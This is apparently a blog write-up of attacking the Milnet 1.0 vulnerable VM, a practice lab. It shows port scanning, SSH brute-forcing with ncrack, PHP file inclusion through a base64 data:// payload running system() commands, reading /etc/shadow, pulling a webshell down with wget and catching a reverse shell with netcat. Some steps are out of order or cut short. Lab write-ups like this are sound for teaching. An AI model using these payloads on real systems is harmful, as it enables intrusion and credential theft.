Milnet 1.0 Vuln VM

Did the first part of a vulnerable vm. First part meaning got a reverse shell, but have not achieved root access.

  1. I fired up burp and pressed on of the buttons to see the request. The requests had your basic headers, however, it had
  2. Dirbuster found 7 different php files. I attempted to navigate to each one but each file was just a piece of the website I had poked around to.
    • After messing around with those a little bit, and zooming in really far on an image I decided to move on.
  3. Next I browsed to the ip in my browser and saw a very basic web page, in German….
    • Poked around a little bit, and didn’t find much, no text boxes, no upload function. Popped it into dirbuster to see if anything lucky would come up.
  4. Quickly started up ncrack against the root user to see if I could get lucky.
  5. After booting the box did a quick nmap scan and found port 22 (ssh) and port 80 (Usually a web server).
    • route=index
      • At this particular moment I was on the
    • Tried a couple of the other links and sure enough, it just dropped the .php and set route=<suffix>.
    • Didn’t know what this meant at the time but started googling.
  6. I assumed I needed to find a way to run a command or something in php.
    • Also, I knew I needed some way to drop the “.php” that was appended to the end.
  7. I found a code snippet that looked like this
    • route=data://text/plain;base64,PD9waHAgc3lzdGVtKCdscycpOyA/Pg==
    • The last part is a base64 string of <?php system(‘ls’); ?>
  8. I started chucking random commands in there, was able to cat /etc/shadow and started a new ncrack on the user that was in there.
    • Spoiler alert: got nothing
  9. Was talking in the SDHackers slack channel about what next steps I should take and found out about something called a webshell.
    • Found one built into the Kali distro
    • Had to figure out a way to get this uploaded…
  10. Figured wget would be the best way to do it.
    • Had to boot up a simpleHTTPServer with python.
      • Python -m simpleHTTPServer
      • This command worked out of the box
  11. After I booted this server, ran <?php system(‘wget; ?>
    • However this didn’t encode correctly… So I did this
    • <?php system(‘ls; wget; ?>
      • Good ol’ encoding.
  12. After that command was run through the burp repeater, I fired up a netcat listener.
    1. nc -lvp 4444
  13. Launched this url in my browser
  14. and blam, got a basic shell. Now just need to priv escalate.


Leave a Reply

Your email address will not be published. Required fields are marked *